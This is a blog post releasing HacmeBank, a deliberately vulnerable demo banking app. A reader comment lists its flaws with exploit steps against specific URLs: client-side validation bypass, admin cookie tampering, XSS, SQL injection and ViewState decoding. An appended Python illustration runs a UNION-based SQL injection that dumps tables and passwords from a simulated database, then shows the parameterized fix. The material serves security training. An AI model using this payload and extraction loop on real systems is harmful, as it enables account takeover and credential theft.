Updated version of HacmeBank
Monday, December 8, 2008 at 1:19AM
I've just uploaded an updated (ported to Visual Studio 2008) version of HacmeBank, a demo banking application with several critical vulnerabilities. I was one of the developers of this Open Source application, which was originally published by Foundstone (download the original version from here).
In addition to the original code and vulnerabilities, this package also includes a tool I developed ages ago called the 'SQL Injection Database Explorer', which allows remote browsing of the databases hosted by the HacmeBank SQL Server (using the SQL Injection vulnerability on the Login form of the home page).
I'm publishing this application here because I'm planning to use it in multiple demos of O2 functionality (and because there are several technical elements of HacmeBank that I want to talk about in future posts).
So, you can download the binaries and source code from here: HacmeBank_v2.0 (Dinis version - 7 Dec 08).zip (4M). I've also created 3 videos, which you can see by clicking on the screenshots below:
Dinis Cruz
Reader Comments (1)
I found this from a WAF Bake-off event I organized in Apr 06 in London. Need to clean it up a bit, but it is a good start for the list of vulnerabilities in HacmeBank.
A1 Unvalidated Input
Vulnerability: Account Transfer validation for negative values is only performed at the client.
Exploit: Use a proxy (or a browser tamper plugin) to inject a negative number in the form at
http://209.97.215.160/aspx/main.aspx?function=AccountTransfer
(this will transfer an amount TO the source account FROM the target account, i.e. the opposite of the expected behavior).
Vulnerability: Maximum number of login attempts is controlled by a client-side cookie.
Exploit: Use a proxy (or a browser tamper plugin) to change the value of the CookieLoginAttempts cookie (for example to 5000).
A2 Broken Access Control
Vulnerability: Admin pages available to anonymous users.
Exploit: After login, a normal user is able to access the following admin pages:
http://209.97.215.160/aspx/Main.aspx?function=admin\Fetch_Web_Page
http://209.97.215.160/aspx/Main.aspx?function=admin\Manage_Accounts
http://209.97.215.160/aspx/Main.aspx?function=admin\Manage_Messages
http://209.97.215.160/aspx/Main.aspx?function=admin\Manage_Users
http://209.97.215.160/aspx/Main.aspx?function=admin\Sql_Query
http://209.97.215.160/aspx/Main.aspx?function=admin\Web_Services
Note: these pages must be available to valid administrators.
A3 Broken Authentication
Vulnerability: Session Hijacking via the ASP.NET_Session cookie.
Exploit: Discover a valid ASP.NET_Session cookie, and hijack that account by changing the cookie in the browser or injecting it via a proxy.
Vulnerability: Admin site protected with a weak cookie.
Exploit: Access to the admin site is controlled by a client-side cookie called 'admin' (on login, this value is false, and it is set to true after a successful Response to the Challenge posted at http://209.97.215.160/aspx/main.aspx?function=AdminSection). To access the admin area, login as a normal user and change the value of the 'admin' cookie from false to true.
Vulnerability: WebServices are accessible by anonymous users.
Exploit: Access the WebServices directly.
A4 Cross Site Scripting (XSS)
Vulnerability: Cross Site Scripting (XSS)
Exploit: Insert XSS payload in:
- Account Transfer 'Comment' field:
http://209.97.215.160/aspx/main.aspx?function=AccountTransfer
- 'Request a Loan' 'Comment' field:
http://209.97.215.160/aspx/main.aspx?function=Loan
- Post Message 'Subject' or 'Text' fields:
http://209.97.215.160/aspx/main.aspx?function=PostMessageForm
A6 Injection Flaws
Vulnerability: SQL Injection
Exploit: Insert SQL payload in:
- Login Page 'Username' or 'Password' fields:
http://209.97.215.160/aspx/main.aspx?function=PostMessageForm
- Transaction Details account_no GET field:
http://209.97.215.160/aspx/Main.aspx?function=TransactionDetails&account_no=5204320422040001
- Account Transfer 'Comment' field:
http://209.97.215.160/aspx/main.aspx?function=AccountTransfer
- 'Request a Loan' 'Comment' field:
http://209.97.215.160/aspx/main.aspx?function=Loan
- Post Message 'Subject' or 'Text' fields:
http://209.97.215.160/aspx/main.aspx?function=PostMessageForm
A7 Improper Error Handling
Vulnerability: Detailed error messages sent to the client.
Exploit: Force SQL errors on:
- Login Page 'Username' or 'Password' fields:
http://209.97.215.160/aspx/main.aspx?function=PostMessageForm
- Account Transfer 'Comment' field:
http://209.97.215.160/aspx/main.aspx?function=AccountTransfer
- 'Request a Loan' 'Comment' field:
http://209.97.215.160/aspx/main.aspx?function=Loan
A8 Insecure Storage
Vulnerability: SessionState contains the Challenge's Response.
Exploit: 1) Decode the ViewState from the Admin Section login page (http://209.97.215.160/aspx/main.aspx?function=AdminSection), 2) discover the Challenge's Response value in the decoded ViewState, and 3) use that value to login to the admin area (the Challenge's Response value is stored in an Asp.net control which is marked with 'visible=false', but is still stored in the ViewState).
Vulnerability: Challenge's Response weak encryption.
Exploit: Brute force the Challenge's Response, since it is calculated by XORing the Challenge against a simple number.
A10 Insecure Configuration Management
Vulnerability: Directory Listing Enabled.
Exploit: Open the page http://209.97.215.160/install/
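The post mentions a 'SQL Injection Database Explorer' that browses the database through the Login form, and the comment above lists that same login-form injection under A6. The Python below is an added illustration of the technique those two refer to; it is not code from the post, from HacmeBank, or from the commenter. It simulates a login query built by string concatenation, walks the database catalog through it one value per request, and shows the parameterized query that closes the hole. Everything in it is constructed for the example: the in-memory SQLite database and its sample rows stand in for the HacmeBank SQL Server (so the catalog table and paging syntax are SQLite's, not T-SQL's), and it assumes the login page echoes the matched user name on success and nothing on failure, which is the channel the payload reads through.

```python
import sqlite3


def build_demo_db():
    """Constructed stand-in for the HacmeBank database: an in-memory SQLite
    database with sample users and accounts (not HacmeBank's real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (user_name TEXT, password TEXT);
        CREATE TABLE accounts (user_name TEXT, account_no TEXT, balance REAL);
        INSERT INTO users VALUES ('alice', 'secret1'), ('bob', 'secret2');
        INSERT INTO accounts VALUES ('alice', '1001', 1500.0), ('bob', '1002', 250.0);
    """)
    return conn


def vulnerable_login(conn, user_name, password):
    """Login check built by string concatenation (the pattern behind a
    login-form SQL injection). Assumption for the example: the page echoes
    the matched user name on success and nothing on failure, which is the
    channel the explorer below reads through."""
    sql = ("SELECT user_name FROM users WHERE user_name = '" + user_name
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(conn, user_name, password):
    """Same check with bound parameters: attacker input can never become SQL.
    (Passwords stay plaintext only to mirror the demo app's data.)"""
    row = conn.execute(
        "SELECT user_name FROM users WHERE user_name = ? AND password = ?",
        (user_name, password),
    ).fetchone()
    return row[0] if row else None


def inject_one(conn, login, expression, offset):
    """Read one value out of the database through the login form. The payload
    closes the user_name literal, UNIONs in our own SELECT, pages to the
    wanted row, and comments out the rest of the original WHERE clause.
    LIMIT/OFFSET is SQLite paging; against SQL Server an explorer would use
    TOP 1 ... WHERE name NOT IN (...) instead."""
    payload = f"' UNION SELECT {expression} ORDER BY 1 LIMIT 1 OFFSET {offset} -- "
    return login(conn, payload, "x")


def explore(conn, login, expression, max_rows=1000):
    """Collect every row the expression yields, one login request per row,
    stopping when the page stops echoing a value."""
    values = []
    for offset in range(max_rows):
        value = inject_one(conn, login, expression, offset)
        if value is None:
            break
        values.append(value)
    return values


def list_tables(conn, login):
    """Enumerate user tables from the catalog (sqlite_master here; sysobjects
    or INFORMATION_SCHEMA.TABLES on SQL Server)."""
    return explore(conn, login, "name FROM sqlite_master WHERE type = 'table'")


def dump_table(conn, login, table, columns):
    """Dump rows of a table, concatenating the columns into the single string
    value the login page echoes."""
    expression = " || ':' || ".join(columns) + " FROM " + table
    return explore(conn, login, expression)


if __name__ == "__main__":
    conn = build_demo_db()
    print("tables via vulnerable login:", list_tables(conn, vulnerable_login))
    print("users via vulnerable login:",
          dump_table(conn, vulnerable_login, "users", ["user_name", "password"]))
    print("tables via safe login:", list_tables(conn, safe_login))
```

Each request leaks a single value, which is why a browsing tool of this kind issues many requests and why the login page's error text (A7 above) or a bare success/failure signal is enough to drive it. The parameterized version returns nothing for every payload, and the same discipline applies to the other injection points in the list (the account_no GET parameter and the comment, subject and text fields).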